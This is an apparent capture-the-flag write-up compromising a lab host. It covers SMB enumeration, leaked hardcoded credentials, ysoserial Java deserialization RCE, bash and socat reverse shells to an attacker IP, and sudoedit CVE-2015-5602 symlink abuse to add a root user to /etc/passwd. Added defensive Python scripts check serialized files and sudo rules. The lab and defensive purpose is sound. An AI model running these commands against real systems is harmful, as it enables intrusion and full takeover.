Summary

We will gain RCE on this machine through a Java Deserialization attack. Then, we'll escalate our privileges with sudoedit.

Enumeration

Nmap

We'll start off with an nmap scan.

kali@kali:~$ sudo nmap -sV -sC 192.168.120.53
[sudo] password for kali:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-06 19:00 -03
Nmap scan report for 192.168.120.53
Host is up (0.15s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 36:cd:06:f8:11:72:6b:29:d8:d8:86:99:00:6b:1d:3a (RSA)
|   256 7d:12:27:de:dd:4e:8e:88:48:ef:e3:e0:b2:13:42:a1 (ECDSA)
|_  256 c4:db:d3:61:af:85:95:0e:59:77:c5:9e:07:0b:2f:74 (ED25519)
80/tcp   open  http        Apache httpd 2.4.6 ((CentOS))
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS)
|_http-title: Landed by HTML5 UP
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
445/tcp  open  netbios-ssn Samba smbd 4.10.4 (workgroup: SAMBA)
8080/tcp open  http-proxy
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Cache-Control: no-cache, no-store, max-age=0, must-revalidate
|     Pragma: no-cache
|     Expires: 0
|     X-Frame-Options: DENY
|     Content-Type: text/html;charset=UTF-8
|     Content-Language: en-US
|     Date: Tue, 06 Oct 2020 22:00:22 GMT
|     Connection: close
|     <!doctype html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title></title>
|     <link rel="stylesheet" href="/css/main.css">
|     </head>
|     <body>
|     <div class="small-container">
|     <div class="flex-row">
|     <h1>Recycler Management System</h1>
|     </div>
|     <div class="flex-row">
|     <img src="/images/factory.jpg" class="round-button">
|     </div>
|     </div>
|
|     <div class="small-container">
|     <div class="flex-small">Control system for the factory
|   HTTPOptions:
|     HTTP/1.1 200
|     Allow: GET,HEAD,OPTIONS
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Cache-Control: no-cache, no-store, max-age=0, must-revalidate
|     Pragma: no-cache
|     Expires: 0
|     X-Frame-Options: DENY
|     Content-Length: 0
|     Date: Tue, 06 Oct 2020 22:00:22 GMT
|     Connection: close
|   RTSPRequest:
|     HTTP/1.1 400
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Tue, 06 Oct 2020 22:00:22 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_    Request</h1></body></html>
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Site doesn't have a title (text/html;charset=UTF-8).
|_http-trane-info: Problem with XML parsing of /evox/about
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.80%I=7%D=10/6%Time=5F7CE8F6%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,429,"HTTP/1\.1\x20200\x20\r\nX-Content-Type-Options:\x20nosnif
SF:f\r\nX-XSS-Protection:\x201;\x20mode=block\r\nCache-Control:\x20no-cach
SF:e,\x20no-store,\x20max-age=0,\x20must-revalidate\r\nPragma:\x20no-cache
SF:\r\nExpires:\x200\r\nX-Frame-Options:\x20DENY\r\nContent-Type:\x20text/
SF:html;charset=UTF-8\r\nContent-Language:\x20en-US\r\nDate:\x20Tue,\x2006
SF:\x20Oct\x202020\x2022:00:22\x20GMT\r\nConnection:\x20close\r\n\r\n<!doc
SF:type\x20html>\n<html\x20lang=\"en\">\n\n<head>\n\x20\x20<meta\x20charse
SF:t=\"utf-8\">\n\x20\x20<meta\x20http-equiv=\"x-ua-compatible\"\x20conten
SF:t=\"ie=edge\">\n\x20\x20<meta\x20name=\"viewport\"\x20content=\"width=d
SF:evice-width,\x20initial-scale=1\">\n\n\x20\x20<title></title>\n\n\x20\x
SF:20<link\x20rel=\"stylesheet\"\x20href=\"/css/main\.css\">\n\x20\x20\n</
SF:head>\n\n<body>\n\t\n\t<div\x20class=\"small-container\">\n\t\t<div\x20
SF:class=\"flex-row\">\n\t\t\t<h1>Recycler\x20Management\x20System</h1>\n\
SF:t\t</div>\n\t\t<div\x20class=\"flex-row\">\n\t\t\t<img\x20src=\"/images
SF:/factory\.jpg\"\x20class=\"round-button\">\n\t\t</div>\x20\n\n\t</div>\
SF:n\t\n\t<div\x20class=\"small-container\">\n\n\t\t\t<div\x20class=\"
SF:flex-small\">Control\x20system\x20for\x20the\x20factory\x20")%r(HTTPOpt
SF:ions,12B,"HTTP/1\.1\x20200\x20\r\nAllow:\x20GET,HEAD,OPTIONS\r\nX-Conte
SF:nt-Type-Options:\x20nosniff\r\nX-XSS-Protection:\x201;\x20mode=block\r\
SF:nCache-Control:\x20no-cache,\x20no-store,\x20max-age=0,\x20must-revalid
SF:ate\r\nPragma:\x20no-cache\r\nExpires:\x200\r\nX-Frame-Options:\x20DENY
SF:\r\nContent-Length:\x200\r\nDate:\x20Tue,\x2006\x20Oct\x202020\x2022:00
SF::22\x20GMT\r\nConnection:\x20close\r\n\r\n")%r(RTSPRequest,24E,"HTTP/1\
SF:.1\x20400\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-La
SF:nguage:\x20en\r\nContent-Length:\x20435\r\nDate:\x20Tue,\x2006\x20Oct\x
SF:202020\x2022:00:22\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20h
SF:tml><html\x20lang=\"en\"><head><title>HTTP\x20Status\x20400\x20\xe2\x80
SF:\x93\x20Bad\x20Request</title><style\x20type=\"text/css\">body\x20{font
SF:-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:w
SF:hite;background-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{fo
SF:nt-size:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20
SF:a\x20{color:black;}\x20\.line\x20{height:1px;background-color:#525D76;b
SF:order:none;}</style></head><body><h1>HTTP\x20Status\x20400\x20\xe2\x80\
SF:x93\x20Bad\x20Request</h1></body></html>");
Service Info: Host: CASSIOS

Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m35s, median: 0s
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.10.4)
|   Computer name: cassios
|   NetBIOS computer name: CASSIOS\x00
|   Domain name: \x00
|   FQDN: cassios
|_  System time: 2020-10-06T18:00:39-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-10-06T22:00:38
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

The scan shows several interesting details.

Curl

First, let's explore the HTTP service on port 8080.

kali@kali:~$ curl http://192.168.120.53:8080/
...

<body>

        <div class="small-container">
                <div class="flex-row">
                        <h1>Recycler Management System</h1>
                </div>
                <div class="flex-row">
                        <img src="/images/factory.jpg" class="round-button">
                </div>

        </div>

        <div class="small-container">

                        <div class="flex-small">Control system for the factory recycler. Access the Dashboard for more options.</div>
                        <div class="flex-small"><a href="/dashboard" class="button">Dashboard</a></div>

        </div>
</body>
...

This appears to be some kind of application for reviewing the status of a machine. When accessing the web application, we see a "Dashboard" button that requires credentials. We'll make a note of this and explore the other available services on the target.

Samba

Interestingly, smbclient lets us list the shares with an empty password, i.e. an anonymous login.

$ smbclient -L \\192.168.120.53
Enter WORKGROUP\kali's password:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        Samantha Konstan Disk      Backups and Recycler files
        IPC$            IPC       IPC Service (Samba 4.10.4)
SMB1 disabled -- no workgroup available

We discover an open share (Samantha Konstan) that seems to be related to the "Recycler" web application. Let's explore this share.

kali@kali:~$ smbclient "\\\\192.168.120.53\\Samantha Konstan"
Enter WORKGROUP\kali's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Sep 24 14:37:41 2020
  ..                                  D        0  Thu Sep 24 14:38:10 2020
  recycler.ser                        N        0  Wed Sep 23 22:35:15 2020
  readme.txt                          N      478  Thu Sep 24 14:32:50 2020
  spring-mvc-quickstart-archetype      D        0  Thu Sep 24 14:36:11 2020
  thymeleafexamples-layouts           D        0  Thu Sep 24 14:37:09 2020
  resources.html                      N    42713  Thu Sep 24 14:37:41 2020
  pom-bak.xml                         N     2187  Thu Oct  1 16:09:51 2020

                8374272 blocks of size 1024. 6454116 blocks available

We'll download readme.txt, recycler.ser, and pom-bak.xml for further inspection.

smb: \> get readme.txt
getting file \readme.txt of size 478 as readme.txt (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)

smb: \> get recycler.ser
getting file \recycler.ser of size 0 as recycler.ser (0.0 KiloBytes/sec) (average 0.5 KiloBytes/sec)

smb: \> get pom-bak.xml
getting file \pom-bak.xml of size 2187 as pom-bak.xml (4.2 KiloBytes/sec) (average 4.2 KiloBytes/sec)
smb: \>

We'll use this SMB session again, so let's leave it open for now. Let's inspect readme.txt and recycler.ser.

kali@kali:~$ cat readme.txt
The recycler is a critical piece of our industrial infraestructure.
Please be careful with it!

The .ser file holds all the last data saved from the process, it can
be readed from the upper management dashboard app.

Remember to set the location of the file to my home directory "~/backups".

Set this directory to share access so the remote system can access the
file via SMB.

Any concerns or suggestions, please reach at [email protected].

Samantha Konstan
Java Mantainer

kali@kali:~$  cat recycler.ser
kali@kali:~$

The recycler.ser file is empty, and we don't know the password for the web application. A quick online search indicates that .ser files usually hold serialized Java objects. Let's continue exploring.

DIRB

We'll brute-force directories and files on the port 80 web server using dirb and its default wordlist.

kali@kali:~$ dirb http://192.168.120.53/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Oct  1 15:26:49 2020
URL_BASE: http://192.168.120.53/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.120.53/ ----
==> DIRECTORY: http://192.168.120.53/assets/
==> DIRECTORY: http://192.168.120.53/backup_migrate/
+ http://192.168.120.53/cgi-bin/ (CODE:403|SIZE:210)
+ http://192.168.120.53/download (CODE:200|SIZE:1479862)
==> DIRECTORY: http://192.168.120.53/images/
+ http://192.168.120.53/index.html (CODE:200|SIZE:9088)
...

We find an interesting backup_migrate directory. Let's navigate to that directory with curl.

kali@kali:~$ curl http://192.168.120.53/backup_migrate/ | html2text

****** Index of /backup_migrate ******
[[ICO]]       Name             Last_modified    Size Description
===========================================================================
[[PARENTDIR]] Parent_Directory                    -
[[   ]]       recycler.tar     2020-10-01 14:39 230K
===========================================================================

We have discovered what appears to be a backup file related to the "Recycler" application. Let's download it and explore its contents.

kali@kali:~$ wget http://192.168.120.53/backup_migrate/recycler.tar
--2020-10-01 15:42:40--  http://192.168.120.53/backup_migrate/recycler.tar
Connecting to 192.168.120.53:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 235520 (230K) [application/x-tar]
Saving to: ‘recycler.tar’

recycler.tar            100%[=============================>] 230.00K   449KB/s    in 0.5s

2020-10-01 15:42:41 (449 KB/s) - ‘recycler.tar’ saved [235520/235520]

kali@kali:~$ tar xvf recycler.tar
src/
src/main/
src/main/resources/
src/main/resources/static/
src/main/resources/static/css/
src/main/resources/static/css/main.css
src/main/resources/static/css/graph.css
src/main/resources/static/images/
src/main/resources/static/images/factory.jpg
src/main/resources/templates/
src/main/resources/templates/home.html
src/main/resources/templates/login.html
src/main/resources/templates/hello.html
src/main/resources/templates/dashboard.html
src/main/resources/application.properties
src/main/java/
src/main/java/com/
src/main/java/com/industrial/
src/main/java/com/industrial/recycler/
src/main/java/com/industrial/recycler/WebSecurityConfig.java
src/main/java/com/industrial/recycler/._DashboardController.java
src/main/java/com/industrial/recycler/DashboardController.java
src/main/java/com/industrial/recycler/RecyclerApplication.java
src/main/java/com/industrial/recycler/Test.java
src/main/java/com/industrial/recycler/._Recycler.java
src/main/java/com/industrial/recycler/Recycler.java
src/main/java/com/industrial/recycler/MvcConfig.java

This is Java source code for the application. The WebSecurityConfig.java file is particularly interesting.

kali@kali:~$ cat src/main/java/com/industrial/recycler/WebSecurityConfig.java
package com.industrial.recycler;

import org.springframework.context.annotation.Bean;
...

        @Bean
        @Override
        public UserDetailsService userDetailsService() {
                UserDetails user =
                         User.withDefaultPasswordEncoder()
                                .username("recycler")
                                .password("DoNotMessWithTheRecycler123")
                                .roles("USER")
                                .build();
...

The username recycler and the password DoNotMessWithTheRecycler123 appear to be hardcoded. These credentials work against the web application on port 8080, and we can now load the /dashboard page.


Exploitation

Java Deserialization Vulnerability

Recall that, at first, the recycler.ser file was empty. On the dashboard web page, we can see some null values.

When we click "Check Status", these values don't change. However, clicking "Save Current Values" replaces the null values with data:


Let's re-download recycler.ser in our SMB session and inspect it for changes.

smb: \> get recycler.ser
getting file \recycler.ser of size 145 as recycler.ser (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)

The file now contains Java serialized data.

kali@kali:~$ file recycler.ser
recycler.ser: Java serialization data, version 5

kali@kali:~$ cat recycler.ser
��sr com.industrial.recycler.RecyclerLdate_atLjava/lang/String;Lliquidq~Lsolidq~Ltotalq~xptNow()t89t11t7

The dashboard saves the application state as a Java serialized file, and "Check Status" reads it back. Since the file lives on a share we can write to, we might be able to overwrite it and exploit the application with a Java deserialization attack.

We'll use ysoserial to attempt to exploit this vulnerability. Let's download it now.

kali@kali:~$ wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar -O ysoserial.jar
...
kali@kali:~$

This tool requires one important piece of information: which payload (gadget chain) to generate, and that depends on the libraries available on the target's classpath. The best clue lies in the pom-bak.xml file we downloaded earlier from the Samba share:

kali@kali:~$ cat pom-bak.xml
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
        <modelVersion>4.0.0</modelVersion>
        <parent>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-starter-parent</artifactId>
                <version>2.3.4.RELEASE</version>
                <relativePath/> <!-- lookup parent from repository -->
        </parent>
        <groupId>com.industrial</groupId>
        <artifactId>recycler</artifactId>
        <version>0.0.1-SNAPSHOT</version>
        <name>recycler</name>
        <description>Recycler Control Information</description>
...
                <dependency>
                    <groupId>org.apache.commons</groupId>
                    <artifactId>commons-collections4</artifactId>
                    <version>4.0</version>
                </dependency>
                <dependency>
...

One particular line (<artifactId>commons-collections4</artifactId>) points us in the right direction. We will use CommonsCollections4 as the payload when we launch the attack.
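As an added, defender-side example (not part of the original writeup and not code from the Recycler application), the following Python script reads the Java serialization stream format that recycler.ser uses and lists every class the stream declares, so that a file pulled from the share can be checked against an allowlist before the dashboard deserializes it. The first sample stream is reconstructed from the strings visible in the dump of recycler.ser above with a placeholder serialVersionUID; the second sample and the class name com.example.NotTheRecycler are constructed. A gadget-chain payload built from a library such as commons-collections4 has to declare that library's classes in its class descriptors, which is exactly what an allowlist check catches.

```python
import re
import struct

# Java serialization stream constants (java.io.ObjectStreamConstants)
STREAM_MAGIC = b"\xac\xed"
STREAM_VERSION = 5          # "Java serialization data, version 5" as reported by file(1)
TC_NULL, TC_REFERENCE, TC_CLASSDESC = 0x70, 0x71, 0x72
TC_OBJECT, TC_STRING, TC_ENDBLOCKDATA = 0x73, 0x74, 0x78
SC_SERIALIZABLE, SC_EXTERNALIZABLE, SC_ENUM = 0x02, 0x04, 0x10

# Class name as written in a class descriptor: dotted name, or an array type such as [B or [Ljava.lang.Object;
CLASS_NAME_RE = re.compile(r"^(\[+[BCDFIJSZ]|\[*L?[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*;?)$")

# The only class the dashboard needs when reading recycler.ser (assumption: the four fields seen in the
# dump are java.lang.String values, which are written as TC_STRING records, not as class descriptors).
RECYCLER_ALLOWLIST = frozenset({"com.industrial.recycler.Recycler"})


def class_names(stream):
    """Return every class name declared by a TC_CLASSDESC record in the stream.

    Heuristic scan, not a full grammar parser: a 0x72 byte counts as a descriptor only if it is
    followed by a plausible <u16 length><ASCII name><8-byte serialVersionUID><valid flags> sequence.
    """
    if len(stream) < 4 or stream[:2] != STREAM_MAGIC or struct.unpack(">H", stream[2:4])[0] != STREAM_VERSION:
        raise ValueError("not a Java serialization stream (bad magic or version)")
    names = []
    i = 4
    while i + 3 <= len(stream):
        if stream[i] == TC_CLASSDESC:
            (n,) = struct.unpack(">H", stream[i + 1:i + 3])
            name_bytes = stream[i + 3:i + 3 + n]
            flags_pos = i + 3 + n + 8                      # skip the name and the serialVersionUID
            if n > 0 and len(name_bytes) == n and flags_pos < len(stream):
                name = name_bytes.decode("ascii", errors="replace")
                flags = stream[flags_pos]
                if CLASS_NAME_RE.match(name) and flags & (SC_SERIALIZABLE | SC_EXTERNALIZABLE | SC_ENUM):
                    names.append(name)
                    i = flags_pos + 1
                    continue
        i += 1
    return names


def check_against_allowlist(stream, allowed=RECYCLER_ALLOWLIST):
    """Return (declared_classes, unexpected_classes); a non-empty second item means: do not deserialize."""
    declared = class_names(stream)
    return declared, [name for name in declared if name not in allowed]


# --- constructed sample streams (built here, not captured from the target) -------------------------
CONSTRUCTED_SUID = b"\x00\x00\x00\x00\x00\x00\x00\x01"   # placeholder serialVersionUID


def _utf(text):
    """Java short UTF string: 2-byte big-endian length followed by the bytes."""
    raw = text.encode("utf-8")
    return struct.pack(">H", len(raw)) + raw


def build_recycler_ser(date_at="Now()", liquid="89", solid="11", total="7"):
    """Rebuild a recycler.ser like the one the dashboard writes, from the strings visible in the dump."""
    string_ref = bytes([TC_REFERENCE]) + b"\x00\x7e\x00\x01"   # back-reference to the first TC_STRING handle
    fields = (b"L" + _utf("date_at") + bytes([TC_STRING]) + _utf("Ljava/lang/String;")
              + b"L" + _utf("liquid") + string_ref
              + b"L" + _utf("solid") + string_ref
              + b"L" + _utf("total") + string_ref)
    class_desc = (bytes([TC_CLASSDESC]) + _utf("com.industrial.recycler.Recycler") + CONSTRUCTED_SUID
                  + bytes([SC_SERIALIZABLE]) + struct.pack(">H", 4) + fields
                  + bytes([TC_ENDBLOCKDATA, TC_NULL]))           # no annotations, no superclass
    values = b"".join(bytes([TC_STRING]) + _utf(v) for v in (date_at, liquid, solid, total))
    return STREAM_MAGIC + struct.pack(">H", STREAM_VERSION) + bytes([TC_OBJECT]) + class_desc + values


def build_foreign_ser(class_name="com.example.NotTheRecycler"):
    """A stream whose top-level object is some other Serializable class (constructed, no fields)."""
    class_desc = (bytes([TC_CLASSDESC]) + _utf(class_name) + CONSTRUCTED_SUID
                  + bytes([SC_SERIALIZABLE]) + struct.pack(">H", 0) + bytes([TC_ENDBLOCKDATA, TC_NULL]))
    return STREAM_MAGIC + struct.pack(">H", STREAM_VERSION) + bytes([TC_OBJECT]) + class_desc


if __name__ == "__main__":
    for label, blob in (("dashboard-written", build_recycler_ser()), ("foreign class", build_foreign_ser())):
        declared, unexpected = check_against_allowlist(blob)
        print(f"{label}: declared={declared} unexpected={unexpected} -> {'REJECT' if unexpected else 'ok'}")
```

The real fix belongs in the application: give the ObjectInputStream a serialization filter (ObjectInputFilter, JEP 290, in Java 9 and backported to 8u121) that rejects every class except com.industrial.recycler.Recycler, and stop reading the file from a share that anonymous users can write to. The scan above is a triage aid for files already on disk; because it is heuristic, pair it with a full stream parser such as SerializationDumper when the verdict matters.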

We must set the location of the file as outlined in readme.txt:

Remember to set the location of the file to my home directory "~/backups".

The readme.txt also mentions the name "Samantha". For our first attempt, let's assume that the username is samantha and that the directory referred to is /home/samantha/backups. Let's try a simple test: we'll attempt to create a file in that directory to determine whether we have RCE. We pass the payload name and the command to execute on the command line.

kali@kali:~$ java -jar ysoserial.jar CommonsCollections4 "touch /home/samantha/backups/hacked" > recycler.ser
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

Next, we'll upload this file using the SMB session and click "Check Status" on the page to deserialize the malicious data we just created.

smb: \> put recycler.ser
putting file recycler.ser as \recycler.ser (9.0 kb/s) (average 9.0 kb/s)

When we click the button, the values revert to null once again. Let's see if our file exists.

smb: \\> ls
  .                                   D        0  Thu Oct  1 16:22:23 2020
  ..                                  D        0  Thu Sep 24 14:38:10 2020
  recycler.ser                        A     3567  Thu Oct  1 16:22:20 2020
  readme.txt                          N      478  Thu Sep 24 14:32:50 2020
  spring-mvc-quickstart-archetype      D        0  Thu Sep 24 14:36:11 2020
  thymeleafexamples-layouts           D        0  Thu Sep 24 14:37:09 2020
  resources.html                      N    42713  Thu Sep 24 14:37:41 2020
  pom-bak.xml                         N     2187  Thu Oct  1 16:09:51 2020
  hacked                              N        0  Thu Oct  1 16:22:23 2020

This confirms that we have remote code execution. Very nice. Let's create a bash reverse shell.

kali@kali:~$ cat rev.sh
bash -i >& /dev/tcp/192.168.118.8/139 0>&1

Next, let's create an updated malicious serialized file.

kali@kali:~$ java -jar ysoserial.jar CommonsCollections4 "bash /home/samantha/backups/rev.sh" > recycler.ser

We'll upload both files using SMB.

smb: \> put rev.sh
putting file rev.sh as \rev.sh (0.4 kb/s) (average 17.7 kb/s)
smb: \> put recycler.ser
putting file recycler.ser as \recycler.ser (37.8 kb/s) (average 24.1 kb/s)
smb: \>

Finally, let's set up a netcat listener on port 139 and click the "Check Status" button on the page to obtain our reverse shell.

kali@kali:~$  sudo nc -lvnp 139
[sudo] password for kali:
listening on [any] 139 ...
connect to [192.168.118.8] from (UNKNOWN) [192.168.120.53] 37750
bash: no job control in this shell
[samantha@cassios /]$
[samantha@cassios /]$ cd /home/samantha
[samantha@cassios ~]$

Escalation

Sudoedit 1.8.14

Next, we need to escalate our privileges. After a bit of enumeration, we find something interesting about our sudo permissions:

[samantha@cassios ~]$ sudo -l
Matching Defaults entries for samantha on cassios:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="QTDIR
    KDEDIR"

User samantha may run the following commands on cassios:
    (root) NOPASSWD: sudoedit /home/*/*/recycler.ser

It seems we can run sudoedit on recycler.ser in our home directory with elevated privileges and without the password. Let's check the version of sudo we are dealing with.

[samantha@cassios ~]$ sudo -V
Sudo version 1.8.14
Sudoers policy plugin version 1.8.14
Sudoers file grammar version 44
Sudoers I/O plugin version 1.8.14

According to the Exploit Database, this version is affected by a sudoedit symlink-following vulnerability (CVE-2015-5602) that allows privilege escalation when the sudoers path contains wildcards. Let's test this by following the exploit instructions.
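As an added example (not from the writeup), here is a small Python audit of `sudo -l` and `sudo -V` output that flags exactly the configuration exploited here: a sudoedit rule with a wildcard in a directory component, combined with a sudo release older than 1.8.15. The sample inputs are copies of the outputs shown above; the severity labels and the report wording are my own choices.

```python
import re

# sudo -l and sudo -V output as shown in the writeup (copied here as sample input)
SAMPLE_SUDO_L = """\
Matching Defaults entries for samantha on cassios:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="QTDIR
    KDEDIR"

User samantha may run the following commands on cassios:
    (root) NOPASSWD: sudoedit /home/*/*/recycler.ser
"""
SAMPLE_SUDO_V = "Sudo version 1.8.14\nSudoers policy plugin version 1.8.14\n"

# sudo 1.8.15 introduced sudoedit_checkdir (on by default), the fix for CVE-2015-5602
FIXED_VERSION = (1, 8, 15)
GLOB_CHARS = "*?["
# one command spec line: "(runas) [TAG: ...] command [args]"
SPEC_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


def sudo_version(sudo_v_output):
    """Parse the 'Sudo version X.Y.Z' line into a comparable tuple."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", sudo_v_output)
    if not m:
        raise ValueError("could not find a 'Sudo version' line")
    return tuple(int(x) for x in m.groups())


def audit_sudoedit_rules(sudo_l_output):
    """Flag sudoedit specs whose directory part contains a glob.

    A glob in a directory component lets the invoking user choose a directory they own, place a
    symlink there and have sudoedit open the link target as root. Returns a list of findings.
    """
    findings = []
    in_commands = False
    for line in sudo_l_output.splitlines():
        if "may run the following commands" in line:
            in_commands = True          # Defaults entries above this line are not command specs
            continue
        if not in_commands or not line.strip():
            continue
        m = SPEC_RE.match(line)
        if not m:
            continue
        # several specs may share one line, separated by ", " (sufficient for sudo -l output)
        for spec in re.split(r",\s+", m.group("cmds")):
            argv = spec.split()
            if not argv or argv[0].rsplit("/", 1)[-1] != "sudoedit":
                continue
            for path in argv[1:]:
                directory = path.rsplit("/", 1)[0] if "/" in path else ""
                if any(c in directory for c in GLOB_CHARS):
                    findings.append({
                        "runas": m.group("runas"),
                        "tags": m.group("tags").strip(),
                        "path": path,
                        "reason": "glob in a directory component lets the user pick a directory they control",
                    })
    return findings


def assess(sudo_l_output, sudo_v_output):
    """Combine the rule audit with the version check into a list of report lines."""
    version = sudo_version(sudo_v_output)
    findings = audit_sudoedit_rules(sudo_l_output)
    report = []
    for f in findings:
        severity = "HIGH" if version < FIXED_VERSION else "MEDIUM"
        report.append(f"{severity}: ({f['runas']}) {f['tags']} sudoedit {f['path']}: {f['reason']}")
    if findings and version < FIXED_VERSION:
        report.append("sudo %s predates sudoedit_checkdir (1.8.15): symlinks in user-writable "
                      "directories are followed" % ".".join(map(str, version)))
    return report


if __name__ == "__main__":
    for line in assess(SAMPLE_SUDO_L, SAMPLE_SUDO_V):
        print(line)
```

Remediation is to pin the path in sudoers (for example `sudoedit /home/samantha/backups/recycler.ser` rather than `/home/*/*/recycler.ser`) and to upgrade sudo: from 1.8.15 the `sudoedit_checkdir` option, on by default, refuses to follow symlinks in directories writable by the invoking user, and `sudoedit_follow`, off by default, controls whether sudoedit follows symlinks at all. A rule with a wildcard stays flagged even on a fixed sudo because it still matches more files than intended.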

[samantha@cassios ~]$ mkdir newdir
mkdir newdir
[samantha@cassios ~]$ cd newdir
cd newdir
[samantha@cassios newdir]$ ln -s /etc/passwd recycler.ser
ln -s /etc/passwd recycler.ser
[samantha@cassios newdir]$ cat recycler.ser
cat recycler.ser
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
...

Because sudoedit follows the symlink, it appears that we can edit /etc/passwd as root and add a new entry to escalate. However, sudoedit opens the file in an editor (vim), which requires a fully interactive shell. Fortunately, we find socat installed on the system.

[samantha@cassios newdir]$ which socat
which socat
/usr/bin/socat

This tool can provide a fully interactive shell, and we can use it to proceed. Let's set up a socat listener on port 445 of our attack machine.

kali@kali:~$ sudo socat file:`tty`,raw,echo=0 tcp-listen:445
...

Next, we'll run the tool on the target to upgrade our shell.

[samantha@cassios newdir]$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.118.8:445
<socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.118.8:445
...

This grants us a fully interactive shell.

kali@kali:~$ sudo socat file:`tty`,raw,echo=0 tcp-listen:445
[samantha@cassios newdir]$ id
uid=1000(samantha) gid=1000(samantha) groups=1000(samantha)

Alternative Interactive Shell:

As an alternative to using socat for a fully-interactive shell, we can upload our private SSH key to the user's authorized_keys file and then SSH in. To do that, we would:

  1. Create the /home/samantha/.ssh directory.
  2. If we don't already have one, create an SSH key pair with ssh-keygen.
  3. Host our public key id_rsa.pub on the attacking machine's web server.
  4. Download our public key to the target and save as /home/samantha/.ssh/authorized_keys.
  5. Grant proper permissions (0700 for /home/samantha/.ssh and 0644 for /home/samantha/.ssh/authorized_keys).
  6. SSH in using our private key to obtain a full interactive shell.

Once we have access to an upgraded shell, we can test the vulnerability by editing the file.

[samantha@cassios ~]$ sudoedit /home/samantha/newdir/recycler.ser

We'll press i in vim to enter insert mode and scroll to the bottom of the file:

...
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
-- INSERT --

We'll insert a new root2 user (UID 0) with a password of testing. We can generate the password hash with openssl passwd testing. The final line should read:

root2:KWi2XW05LmkMg:0:0:root:/root:/bin/bash

Next, we insert the line into the file:

root2:KWi2XW05LmkMg:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
...

We'll press ESCAPE to return to command mode and save the file with :wq. After saving the file, we should be able to log in as the new user which will grant us root-level access.

[samantha@cassios ~]$ su - root2
Password: testing
...
[root2@cassios ~]# id
uid=0(root2) gid=0(root) groups=0(root)

PS:

https://github.com/t0kx/privesc-CVE-2015-5602/blob/master/exploit.sh

[samantha@cassios tmp]$ ./exploit.sh
./exploit.sh
[+] CVE-2015-5602 exploit by t0kx
[+] Creating folder...
[+] Creating symlink
[+] Modify EDITOR...
[+] Change root password to: 6a12f449790ed7be96d77aa4c7d9c1c1
